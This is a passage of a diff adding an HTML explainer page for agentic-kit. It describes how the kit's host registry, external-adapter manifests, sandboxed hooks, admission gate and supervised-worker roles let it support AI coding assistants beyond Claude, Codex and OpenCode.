+      <li>Today: can be recognized and registered. Running work through them is the next step.</li>
+    </ul>
+  </div>
+</div>
+
+<h2 id="why">3 · Why this was worth doing</h2>
+<p>Before this effort, the three assistants were <em>described</em> in a registry but <em>acted on</em>
+by name, scattered across the codebase. Adding a fourth meant finding and editing roughly ten
+places that each hard-coded "claude / codex / opencode" — and missing one meant a new host that
+looked installed but silently misbehaved. That's the "open-heart surgery" problem.</p>
+
+<figure>
+<svg viewBox="0 0 860 300" role="img"
+  aria-label="Before: adding a host meant editing about ten scattered dispatch sites. After: one registry entry or one manifest, read everywhere.">
+  <defs>
+    <marker id="w1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" fill="currentColor"/></marker>
+    <marker id="w1t" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/></marker>
+    <marker id="w1c" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--caution)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- BEFORE -->
+    <text x="20" y="24" font-weight="700" style="fill:var(--caution)">BEFORE — reach each host by name</text>
+    <rect x="20" y="40" width="96" height="36" rx="7" fill="none" stroke-width="1.4" style="stroke:var(--caution)"/>
+    <text x="68" y="62" text-anchor="middle" font-weight="700">new host</text>
+    <g font-size="10.5" class="lg">
+      <rect x="176" y="22" width="90" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="221" y="39" text-anchor="middle">dispatch</text>
+      <rect x="176" y="54" width="90" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="221" y="71" text-anchor="middle">status</text>
+      <rect x="176" y="86" width="90" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="221" y="103" text-anchor="middle">uninstall</text>
+      <rect x="282" y="22" width="94" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="329" y="39" text-anchor="middle">permissions</text>
+      <rect x="282" y="54" width="94" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="329" y="71" text-anchor="middle">routing</text>
+      <rect x="282" y="86" width="94" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="329" y="103" text-anchor="middle">guidance</text>
+      <rect x="392" y="38" width="94" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="439" y="55" text-anchor="middle">usage</text>
+      <rect x="392" y="70" width="94" height="26" rx="5" fill="none" stroke="currentColor" opacity="0.85"/><text x="439" y="87" text-anchor="middle">…and more</text>
+    </g>
+    <path d="M116 54 L 172 38" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <path d="M116 60 L 172 66" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <path d="M116 66 L 172 96" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <path d="M116 58 L 278 40" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <path d="M116 63 L 278 92" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <path d="M116 57 L 388 54" stroke-width="1.2" style="stroke:var(--caution)" marker-end="url(#w1c)"/>
+    <text x="255" y="132" font-size="11" style="fill:var(--caution)">~10 edits · miss one and the host silently breaks</text>
+
+    <line x1="20" y1="158" x2="840" y2="158" stroke="currentColor" opacity="0.22"/>
+
+    <!-- AFTER -->
+    <text x="20" y="186" font-weight="700" style="fill:var(--accent)">AFTER — describe it once, read everywhere</text>
+    <rect x="20" y="202" width="124" height="42" rx="7" fill="none" stroke-width="1.5" style="stroke:var(--accent)"/>
+    <text x="82" y="221" text-anchor="middle" font-weight="700">one entry</text>
+    <text x="82" y="237" text-anchor="middle" font-size="10" class="lg">registry or manifest</text>
+    <rect x="212" y="200" width="150" height="46" rx="8" fill="none" stroke-width="1.8" stroke="currentColor"/>
+    <text x="287" y="220" text-anchor="middle" font-weight="800">host registry</text>
+    <text x="287" y="237" text-anchor="middle" font-size="10" class="lg">capability queries</text>
+    <path d="M144 223 L 208 223" stroke-width="1.6" style="stroke:var(--accent)" marker-end="url(#w1t)"/>
+    <g font-size="10.5" class="lg">
+      <rect x="432" y="176" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="480" y="192" text-anchor="middle">dispatch</text>
+      <rect x="432" y="206" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="480" y="222" text-anchor="middle">status</text>
+      <rect x="432" y="236" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="480" y="252" text-anchor="middle">uninstall</text>
+      <rect x="544" y="176" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="592" y="192" text-anchor="middle">permissions</text>
+      <rect x="544" y="206" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="592" y="222" text-anchor="middle">routing</text>
+      <rect x="544" y="236" width="96" height="24" rx="5" fill="none" stroke="currentColor"/><text x="592" y="252" text-anchor="middle">guidance</text>
+    </g>
+    <path d="M362 214 L 428 190" stroke-width="1.4" stroke="currentColor" marker-end="url(#w1)"/>
+    <path d="M362 222 L 428 218" stroke-width="1.4" stroke="currentColor" marker-end="url(#w1)"/>
+    <path d="M362 230 L 428 246" stroke-width="1.4" stroke="currentColor" marker-end="url(#w1)"/>
+    <path d="M362 218 L 540 190" stroke-width="1.4" stroke="currentColor" marker-end="url(#w1)"/>
+    <text x="716" y="220" text-anchor="middle" font-size="11" style="fill:var(--accent)">they ask the registry — never a name</text>
+  </g>
+</svg>
+<figcaption><strong>The value, in one picture.</strong> The commands stopped hard-coding host names
+and started asking the registry "who can do this?" That refactor is done for the three built-ins —
+and it's the same machinery an external adapter plugs into, which is why a fourth host no longer
+means touching ten files.</figcaption>
+</figure>
+
+<p>Along the way the same effort fixed a batch of honesty bugs that were quietly mis-labelling work —
+usage records filed under the wrong assistant, live sessions renamed to an internal placeholder,
+vendor-diversity checks that could be fooled. Truthful reporting is part of the value: a kit that
+supports more hosts has to <em>account</em> for them correctly, not just run them.</p>
+
+<h2 id="what-is">4 · What an external adapter actually is</h2>
+<p><span class="tag soon">for implementers</span> The core safety idea: an adapter is
+<strong>description plus a few small scripts the kit runs at arm's length</strong> — never a plug-in
+loaded into the kit's own process. If a plug-in can crash or take over its host, this is deliberately
+<em>not</em> that.</p>
+
+<figure>
+<svg viewBox="0 0 860 340" role="img"
+  aria-label="An adapter is a JSON manifest plus subprocess hooks. The manifest passes the admission gate's checks; hooks run as separate supervised processes, never in-process.">
+  <defs>
+    <marker id="m1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" fill="currentColor"/></marker>
+    <marker id="m1t" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- manifest -->
+    <rect x="18" y="30" width="208" height="258" rx="10" fill="none" stroke-width="1.6" stroke="currentColor"/>
+    <text x="122" y="54" text-anchor="middle" font-weight="800">the manifest</text>
+    <text x="122" y="71" text-anchor="middle" font-size="10.5" class="lg">one JSON file — pure data</text>
+    <g font-size="11" font-family="ui-monospace, monospace">
+      <text x="36" y="100">name, version, contract</text>
+      <text x="36" y="122">host { capabilities }</text>
+      <text x="36" y="144">detection { bin }</text>
+      <text x="36" y="166">driving { surfaces }</text>
+      <text x="36" y="188">lifecycle { hooks }</text>
+      <text x="36" y="210">trust { changes }</text>
+    </g>
+    <text x="36" y="244" font-size="10.5" class="lg">Any unknown field is rejected —</text>
+    <text x="36" y="260" font-size="10.5" class="lg">the schema is a strict allow-list.</text>
+
+    <!-- gate -->
+    <rect x="270" y="60" width="204" height="188" rx="10" fill="none" stroke-width="1.8" style="stroke:var(--accent)"/>
+    <text x="372" y="84" text-anchor="middle" font-weight="800" style="fill:var(--accent)">admission gate</text>
+    <g font-size="11">
+      <text x="288" y="112">✓ shape is valid</text>
+      <text x="288" y="136">✓ no forbidden claims</text>
+      <text x="288" y="160">✓ contract version matches</text>
+      <text x="288" y="184">✓ not shadowing a built-in</text>
+      <text x="288" y="208">✓ consent matches these bytes</text>
+    </g>
+    <text x="372" y="234" text-anchor="middle" font-size="10" class="lg">any miss → refused, by name</text>
+    <path d="M226 150 L 266 150" stroke-width="1.6" style="stroke:var(--accent)" marker-end="url(#m1t)"/>
+
+    <!-- registry out -->
+    <rect x="512" y="96" width="152" height="52" rx="8" fill="none" stroke-width="1.6" stroke="currentColor"/>
+    <text x="588" y="120" text-anchor="middle" font-weight="700">host registry</text>
+    <text x="588" y="137" text-anchor="middle" font-size="10" class="lg">joins the built-ins</text>
+    <path d="M474 132 L 508 124" stroke-width="1.6" stroke="currentColor" marker-end="url(#m1)"/>
+
+    <!-- hooks -->
+    <rect x="512" y="184" width="330" height="120" rx="10" fill="none" stroke-dasharray="6 4" stroke-width="1.5" stroke="currentColor"/>
+    <text x="677" y="208" text-anchor="middle" font-weight="700">the hooks — run at arm's length</text>
+    <rect x="530" y="224" width="146" height="64" rx="7" fill="none" stroke="currentColor"/>
+    <text x="603" y="250" text-anchor="middle" font-size="11">separate process</text>
+    <text x="603" y="268" text-anchor="middle" font-size="10" class="lg">no shell · env allow-list</text>
+    <rect x="688" y="224" width="138" height="64" rx="7" fill="none" stroke="currentColor"/>
+    <text x="757" y="250" text-anchor="middle" font-size="11">time-boxed</text>
+    <text x="757" y="268" text-anchor="middle" font-size="10" class="lg">killed if it hangs</text>
+    <path d="M588 148 L 588 180" stroke-width="1.4" stroke="currentColor" marker-end="url(#m1)"/>
+    <text x="606" y="170" font-size="10" class="lg">when a step needs logic</text>
+  </g>
+</svg>
+<figcaption><strong>Data first, code at a distance.</strong> The manifest is validated by the same
+checks the built-in hosts pass, plus caps that make forbidden claims impossible to even write down.
+The only code that ever runs is a hook — a separate, supervised, shell-free subprocess with a
+timeout and a minimal environment. Nothing from an adapter runs inside the kit.</figcaption>
+</figure>
+
+<h3>What the kit guarantees about an external host</h3>
+<div class="tablewrap"><table>
+  <tr><th>Question</th><th>Built-in host</th><th>External adapter</th></tr>
+  <tr><td>Can it lead a session (be primary)?</td><td><span class="yes">yes*</span></td><td><span class="no">not by self-declaring — earned only</span></td></tr>
+  <tr><td>Can it claim a billing / quota provider?</td><td><span class="yes">yes*</span></td><td><span class="no">not by self-declaring</span></td></tr>
+  <tr><td>Can it claim a custom status line?</td><td><span class="yes">yes*</span></td><td><span class="no">not by self-declaring</span></td></tr>
+  <tr><td>Does any of its code run inside the kit?</td><td class="no">it <em>is</em> the kit</td><td><span class="no">no — subprocess only</span></td></tr>
+  <tr><td>Can it install software silently?</td><td class="no">only disclosed steps</td><td><span class="no">no — may not even name a package</span></td></tr>
+  <tr><td>What if its manifest is edited after it's trusted?</td><td class="no">n/a</td><td><span class="no">trust is void until re-approved</span></td></tr>
+  <tr><td>What happens if it's broken or malicious?</td><td class="no">n/a</td><td><span class="no">refused by name; other hosts unaffected</span></td></tr>
+</table></div>
+<p class="meta">* "yes" here means a built-in <em>can</em> hold these — which ones actually do varies
+(Claude: all three; Codex: leads and is an AQE provider, but uses a native, not command-backed,
+status line; OpenCode: none). "Primary" means <em>leading</em> the session — a separate axis from
+taking part in <code>ak run</code>, which OpenCode does as a <em>supervised worker</em> (unpacked in
+<a href="#lead-supervised">"Leading vs. being supervised"</a> just below). The safety point stands:
+an external adapter cannot <em>self-declare</em> any of these — the schema has no field to say so —
+but a capability can be <strong>earned</strong> via conformance
+(<a href="#lifecycle">section&nbsp;7</a>).</p>
+
+<h3 id="lead-supervised">Leading vs. being supervised</h3>
+<p>Two capabilities sound similar but are different axes, and the difference is the crux of why
+OpenCode is a full member in some ways and not others. <strong>Leading</strong>
+(<code>canBePrimary</code>) is a host's authority to <em>anchor</em> a run; <strong>being
+supervised</strong> (<code>canRouteActivities</code>) is a host's ability to <em>execute an assigned
+step</em> under the runner's control. A host can have one, both, or — for an external adapter that
+hasn't earned leading — just the second.</p>
+
+<figure>
+<svg viewBox="0 0 860 296" role="img"
+  aria-label="An ak run pipeline: the supervisor materializes a role-to-host plan from the routing policy and spawns each worker under a bounded, supervised contract. The primary host leads — reasoning roles route to it and failed workers escalate toward it. OpenCode can be a supervised worker but never the primary.">
+  <defs>
+    <marker id="ls" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" fill="currentColor"/></marker>
+    <marker id="lsp" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--gov)"/></marker>
+    <marker id="lse" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--caution)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- ak run -->
+    <rect x="20" y="118" width="120" height="52" rx="8" fill="none" stroke-width="1.6" stroke="currentColor"/>
+    <text x="80" y="140" text-anchor="middle" font-weight="700" font-family="ui-monospace, monospace" font-size="11">ak run</text>
+    <text x="80" y="156" text-anchor="middle" font-size="10" class="lg">"add feature"</text>
+    <path d="M140 144 L 172 144" stroke-width="1.6" stroke="currentColor" marker-end="url(#ls)"/>
+
+    <!-- supervisor -->
+    <rect x="176" y="106" width="176" height="76" rx="9" fill="none" stroke-width="1.8" stroke="currentColor"/>
+    <text x="264" y="130" text-anchor="middle" font-weight="700">supervisor (runner)</text>
+    <text x="264" y="149" text-anchor="middle" font-size="10" class="lg">spawns each worker bounded:</text>
+    <text x="264" y="164" text-anchor="middle" font-size="10" class="lg">timeout · escalation · result</text>
+
+    <!-- workers -->
+    <rect x="418" y="24" width="220" height="42" rx="8" fill="none" stroke-width="1.7" style="stroke:var(--gov)"/>
+    <text x="432" y="42" font-size="11">architecture →</text>
+    <text x="528" y="42" font-weight="700" style="fill:var(--gov)">claude</text>
+    <text x="588" y="42" font-size="9.5" style="fill:var(--gov)">· PRIMARY</text>
+    <text x="432" y="57" font-size="9.5" class="lg">supervised worker · leads the run</text>
+
+    <rect x="418" y="76" width="220" height="42" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="432" y="94" font-size="11">implementation →</text>
+    <text x="546" y="94" font-weight="700">codex</text>
+    <text x="432" y="109" font-size="9.5" class="lg">supervised worker</text>
+
+    <rect x="418" y="128" width="220" height="42" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="432" y="146" font-size="11">testing →</text>
+    <text x="500" y="146" font-weight="700">codex</text>
+    <text x="432" y="161" font-size="9.5" class="lg">supervised worker</text>
+
+    <rect x="418" y="180" width="220" height="42" rx="8" fill="none" stroke-width="1.5" stroke="currentColor"/>
+    <text x="432" y="198" font-size="11">review →</text>
+    <text x="496" y="198" font-weight="700">claude</text>
+    <text x="432" y="213" font-size="9.5" class="lg">supervised worker</text>
+
+    <!-- fan-out arrows -->
+    <path d="M352 128 C 386 100, 396 60, 414 48" fill="none" stroke-width="1.4" stroke="currentColor" marker-end="url(#ls)"/>
+    <path d="M352 140 L 414 100" fill="none" stroke-width="1.4" stroke="currentColor" marker-end="url(#ls)"/>
+    <path d="M352 152 L 414 150" fill="none" stroke-width="1.4" stroke="currentColor" marker-end="url(#ls)"/>
+    <path d="M352 160 C 386 190, 396 200, 414 202" fill="none" stroke-width="1.4" stroke="currentColor" marker-end="url(#ls)"/>
+
+    <!-- escalation: codex worker fails -> claude (the primary anchors it) -->
+    <path d="M648 97 C 700 97, 700 45, 646 45" fill="none" stroke-width="1.4" stroke-dasharray="5 4" style="stroke:var(--caution)" marker-end="url(#lse)"/>
+    <text x="712" y="74" text-anchor="middle" font-size="9.5" style="fill:var(--caution)">on failure,</text>
+    <text x="712" y="87" text-anchor="middle" font-size="9.5" style="fill:var(--caution)">escalates to</text>
+    <text x="712" y="100" text-anchor="middle" font-size="9.5" style="fill:var(--caution)">the primary</text>
+
+    <!-- opencode note -->
+    <text x="20" y="212" font-size="10.5" class="lg">An enabled OpenCode would appear here as</text>
+    <text x="20" y="227" font-size="10.5" class="lg">a supervised worker too — never the PRIMARY row.</text>
+    <line x1="20" y1="250" x2="840" y2="250" stroke="currentColor" opacity="0.16"/>
+    <text x="20" y="270" font-size="11" class="lg">Leading = anchors the run (routing + escalation).  Supervised = executes one assigned step, bounded.</text>
+  </g>
+</svg>
+<figcaption><strong>One run, two roles.</strong> The supervisor turns "add feature" into a
+role-to-host plan and spawns each step as a bounded, supervised worker. The <em>primary</em> host
+(Claude by default; <code>ak host pick --primary-host codex</code> flips the lead) anchors the run —
+the reasoning roles route to it and a failed worker escalates toward it. Claude and Codex each appear
+as both a lead and a worker; OpenCode can only ever be a worker.</figcaption>
+</figure>
+
+<div class="tablewrap"><table>
+  <tr><th>Dimension</th><th>Leading (primary)</th><th>Being supervised (routed worker)</th></tr>
+  <tr><td>Capability flag</td><td><code>canBePrimary</code></td><td><code>canRouteActivities</code></td></tr>
+  <tr><td>Which built-ins have it</td><td>Claude, Codex</td><td>Claude, Codex, <strong>OpenCode</strong></td></tr>
+  <tr><td>What it means</td><td>Anchors the run: the default host, the reasoning roles route to it, and failed workers escalate toward it; it leads dual-host mode.</td><td>Executes one assigned activity (architecture, coding, testing, review…) that the runner spawned for it.</td></tr>
+  <tr><td>Chosen by</td><td><code>ak host pick --primary-host</code></td><td>the routing policy, per activity (or a run-local <code>--route</code>)</td></tr>
+  <tr><td>Degree of control</td><td>leads — decides the shape, anchors escalation</td><td>given a task, host, model, and deadline; runs; reports back</td></tr>
+  <tr><td>Bounded?</td><td>it <em>is</em> the session lead</td><td>yes — timeout, a bounded escalation ladder, a structured result</td></tr>
+  <tr><td>OpenCode</td><td><span class="no">never (<code>canBePrimary: false</code>)</span></td><td><span class="yes">yes — a supervised worker</span></td></tr>
+</table></div>
+<p>So "supervised, never primary" isn't a demotion from <code>ak run</code> — it's the opposite:
+OpenCode <em>does</em> run work in a pipeline, as a supervised worker like any other. What it can't
+do is <em>lead</em> one — be the default, own the reasoning roles, or be the host escalation resolves
+toward. That authority stays with a host that can be primary.</p>
+
+<h2 id="today">5 · Where we are — and what's honestly next</h2>
+<p>The door is built and its safety is proven. But a door a host can be <em>registered</em> through is
+not yet a door work can be <em>run</em> through. Here is the truthful staging.</p>
+
+<figure>
+<svg viewBox="0 0 860 210" role="img"
+  aria-label="Rollout stages: today the door can admit a host; next comes a trust command, then running work, then a real adapter passing conformance, then freezing the contract.">
+  <defs>
+    <marker id="r1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7" markerHeight="7" orient="auto"><path d="M0,0 L10,5 L0,10 z" fill="currentColor"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <rect x="16" y="42" width="150" height="98" rx="10" fill="none" stroke-width="2" style="stroke:var(--ok)"/>
+    <text x="91" y="34" text-anchor="middle" font-weight="700" font-size="11" style="fill:var(--ok)">HERE NOW</text>
+    <text x="91" y="70" text-anchor="middle" font-weight="700">Admit</text>
+    <text x="91" y="90" text-anchor="middle" font-size="10.5" class="lg">register an</text>
+    <text x="91" y="105" text-anchor="middle" font-size="10.5" class="lg">external host</text>
+    <text x="91" y="120" text-anchor="middle" font-size="10.5" class="lg">from a manifest</text>
+
+    <g class="lg" font-size="10.5">
+      <rect x="196" y="42" width="140" height="98" rx="10" fill="none" stroke-dasharray="5 4" stroke-width="1.5" stroke="currentColor"/>
+      <text x="266" y="70" text-anchor="middle" font-weight="700" fill="currentColor" font-size="12">Trust</text>
+      <text x="266" y="92" text-anchor="middle">a command to</text>
+      <text x="266" y="107" text-anchor="middle">approve an adapter</text>
+      <text x="266" y="122" text-anchor="middle">(smallest next step)</text>
+
+      <rect x="366" y="42" width="140" height="98" rx="10" fill="none" stroke-dasharray="5 4" stroke-width="1.5" stroke="currentColor"/>
+      <text x="436" y="70" text-anchor="middle" font-weight="700" fill="currentColor" font-size="12">Run</text>
+      <text x="436" y="92" text-anchor="middle">actually drive</text>
+      <text x="436" y="107" text-anchor="middle">work through it</text>
+
+      <rect x="536" y="42" width="140" height="98" rx="10" fill="none" stroke-dasharray="5 4" stroke-width="1.5" stroke="currentColor"/>
+      <text x="606" y="70" text-anchor="middle" font-weight="700" fill="currentColor" font-size="12">Prove</text>
+      <text x="606" y="92" text-anchor="middle">a real adapter</text>
+      <text x="606" y="107" text-anchor="middle">(Hermes) passes</text>
+      <text x="606" y="122" text-anchor="middle">the conformance kit</text>
+
+      <rect x="706" y="42" width="140" height="98" rx="10" fill="none" stroke-dasharray="5 4" stroke-width="1.5" stroke="currentColor"/>
+      <text x="776" y="70" text-anchor="middle" font-weight="700" fill="currentColor" font-size="12">Open</text>
+      <text x="776" y="92" text-anchor="middle">freeze the contract,</text>
+      <text x="776" y="107" text-anchor="middle">drop the flag</text>
+    </g>
+    <path d="M166 90 L 194 90" stroke-width="1.5" marker-end="url(#r1)"/>
+    <path d="M336 90 L 364 90" stroke-width="1.5" marker-end="url(#r1)"/>
+    <path d="M506 90 L 534 90" stroke-width="1.5" marker-end="url(#r1)"/>
+    <path d="M676 90 L 704 90" stroke-width="1.5" marker-end="url(#r1)"/>
+    <text x="430" y="172" text-anchor="middle" font-size="11" class="lg">the experimental switch stays ON until the last step</text>
+  </g>
+</svg>
+<figcaption><strong>Foundation laid, on-ramp staged.</strong> Only the first box is done. Each later
+box is a small, self-contained increment behind the same experimental switch — so nobody is exposed
+to a half-built external host by accident.</figcaption>
+</figure>
+
+<h3>What can be expected today</h3>
+<ul>
+  <li><strong>The three built-in hosts work fully and consistently</strong> — that's the immediate,
+  shipped payoff, and it needs no flag.</li>
+  <li><strong>The internals are ready for more</strong> — a new host is a registry entry or a
+  manifest, not a rewrite.</li>
+  <li><strong>An external host can be recognized and registered</strong> from a manifest, safely and
+  reversibly, behind <code>AK_EXPERIMENTAL_HOST_ADAPTERS=1</code>.</li>
+</ul>
+
+<div class="panel caution">
+  <div class="ptitle">Limitations — read before expecting an external host to "just work"</div>
+  <ul style="margin-bottom:0">
+    <li><strong>Work can't be run through an external host yet.</strong> The kit can admit one into
+    its registry, but driving a task through it (the <code>ak run</code> path) is not built — an
+    admitted external host currently reports "no execution available" rather than running.</li>
+    <li><strong>There's no command to approve one yet.</strong> Approval is checked at admission, but
+    the <code>ak host adapters trust</code> command that would record it isn't built — so in practice
+    admission refuses until that lands. This is the intended <em>next</em> step.</li>
+    <li><strong>Manifests are local files only.</strong> Fetching an adapter from npm or a URL isn't
+    built; a manifest is a file path today.</li>
+    <li><strong>An external host can't <em>self-declare</em> that it's primary, an AQE provider, or a
+    status-line owner.</strong> That block on self-declaration is permanent — it's the safety
+    invariant. But the capability itself is <em>earnable</em>: pass the matching conformance tier and
+    get a maintainer's grant, and an adapter reaches full parity (the graduation ladder in
+    <a href="#lifecycle">section&nbsp;7</a>). One honest exception — being an <em>AQE provider
+    type</em> isn't the kit's to grant; agentic-qe's provider list is defined upstream
+    (<a href="#upstream">section&nbsp;8</a>).</li>
+    <li><strong>It's experimental.</strong> The contract version can still change; nothing about the
+    external-adapter surface is promised stable until the final "Open" stage above.</li>
+  </ul>
+</div>
+
+<h2 id="implementers">6 · For implementers: the shape of an adapter</h2>
+<p>When the on-ramp is complete, authoring a host adapter will mean shipping one manifest and a few
+small hook scripts. The manifest looks like this (illustrative):</p>
+<pre>{
+  "name": "hermes",
+  "version": "0.1.0",
+  "contract": 1,
+  "host": {
+    "id": "hermes",
+    "label": "Hermes",
+    "capabilities": {
+      "canDriveSession": true,
+      "canRouteActivities": true
+      // canBePrimary / commandStatusline: not allowed — omitted by force
+    },
+    "install": { "bin": "hermes", "externalInstallPolicy": "detect-never-overwrite" }
+  },
+  "detection": { "bin": "hermes", "versionArgs": ["--version"] },
+  "driving": { "surfaces": ["cli-subprocess"] },
+  "lifecycle": {
+    "detect": { "hook": { "command": ["hermes", "doctor", "--json"] } }
+  },
+  "trust": { "changes": [ /* what the adapter will touch, disclosed up front */ ] }
+}</pre>
+<p>It is registered in the user's own <code>kit.json</code>, and its exact bytes are approved:</p>
+<pre>// kit.json
+"hostAdapters": [
+  { "name": "hermes", "source": "~/.config/ak/adapters/hermes.json", "contract": 1 }
+]</pre>
+<ul>
+  <li><strong>The conformance kit is the contract.</strong> A committed test harness admits a real
+  fixture adapter, runs its hooks as real subprocesses, and refuses a corpus of bad manifests with
+  exact reasons — the same bar a real adapter (Hermes first) must clear to graduate.</li>
+  <li><strong>Approval is pinned to the bytes.</strong> Consent is a hash of the exact manifest;
+  edit one character and the kit asks again. Content is never approved unseen.</li>
+  <li><strong>Refusals are specific.</strong> An unknown field, a forbidden capability, a bad
+  contract version, a name that collides with a built-in — each is refused by name, and one bad
+  adapter never disturbs the others or the built-ins.</li>
+</ul>
+
+<h2 id="lifecycle">7 · From a contributor's idea to a built-in host</h2>
+<p>This is the part that ties it together: the exact sequence from "someone wants to add Hermes" to
+"a released version of agentic-kit ships Hermes as a first-class built-in." The governing idea —
+<strong>an external adapter is experimental until conformance graduates it.</strong> Conformance is
+the gate; the maintainer is the judge; there are two places a host can land.</p>
+
+<figure>
+<svg viewBox="0 0 880 500" role="img"
+  aria-label="Lifecycle: a contributor authors, self-tests, and publishes an adapter for opt-in users, then proposes it to the maintainer with conformance evidence. The maintainer reproduces conformance and reviews the hooks, then either blesses it as a curated external adapter or promotes it into the built-in registry for the next release.">
+  <defs>
+    <marker id="c1" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/></marker>
+    <marker id="c1g" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--gov)"/></marker>
+    <marker id="c1k" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--ok)"/></marker>
+    <marker id="c1f" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--future)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- CONTRIBUTOR lane -->
+    <text x="20" y="24" font-weight="700" font-size="12.5" style="fill:var(--accent)">CONTRIBUTOR — permissionless, no maintainer needed to start</text>
+    <rect x="20" y="38" width="150" height="60" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="95" y="60" text-anchor="middle" font-weight="700">1 · Author</text>
+    <text x="95" y="78" text-anchor="middle" font-size="10.5" class="lg">manifest +</text>
+    <text x="95" y="92" text-anchor="middle" font-size="10.5" class="lg">hook scripts</text>
+
+    <rect x="196" y="38" width="150" height="60" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="271" y="60" text-anchor="middle" font-weight="700">2 · Self-test</text>
+    <text x="271" y="78" text-anchor="middle" font-size="10.5" class="lg">run the conformance</text>
+    <text x="271" y="92" text-anchor="middle" font-size="10.5" class="lg">kit until green</text>
+
+    <rect x="372" y="38" width="150" height="60" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="447" y="60" text-anchor="middle" font-weight="700">3 · Publish</text>
+    <text x="447" y="78" text-anchor="middle" font-size="10.5" class="lg">ship the manifest</text>
+    <text x="447" y="92" text-anchor="middle" font-size="10.5" class="lg">(their own repo)</text>
+
+    <rect x="548" y="38" width="150" height="60" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="623" y="60" text-anchor="middle" font-weight="700">4 · Propose</text>
+    <text x="623" y="78" text-anchor="middle" font-size="10.5" class="lg">open a PR with the</text>
+    <text x="623" y="92" text-anchor="middle" font-size="10.5" class="lg">conformance report</text>
+
+    <path d="M170 68 L 192 68" stroke-width="1.5" style="stroke:var(--accent)" marker-end="url(#c1)"/>
+    <path d="M346 68 L 368 68" stroke-width="1.5" style="stroke:var(--accent)" marker-end="url(#c1)"/>
+    <path d="M522 68 L 544 68" stroke-width="1.5" style="stroke:var(--accent)" marker-end="url(#c1)"/>
+
+    <!-- permissionless offshoot from Publish (down, clear of the bridge) -->
+    <rect x="372" y="124" width="150" height="44" rx="7" fill="none" stroke-dasharray="4 3" stroke-width="1.3" style="stroke:var(--future)"/>
+    <text x="447" y="143" text-anchor="middle" font-size="10" style="fill:var(--future)">any user can opt in now</text>
+    <text x="447" y="157" text-anchor="middle" font-size="10" style="fill:var(--future)">experimental flag + consent</text>
+    <path d="M447 98 L 447 122" stroke-width="1.2" style="stroke:var(--future)" marker-end="url(#c1f)"/>
+
+    <!-- bridge from Propose down to Verify top; stays right of the offshoot, sweeps left below it -->
+    <path d="M623 98 C 623 190, 540 232, 360 246 S 150 256, 116 258" fill="none" stroke-width="1.6" style="stroke:var(--gov)" marker-end="url(#c1g)"/>
+    <text x="626" y="150" text-anchor="start" font-size="10.5" style="fill:var(--gov)">PR + conformance evidence ↓</text>
+
+    <!-- MAINTAINER lane -->
+    <text x="20" y="248" font-weight="700" font-size="12.5" style="fill:var(--gov)">MAINTAINER — the judge</text>
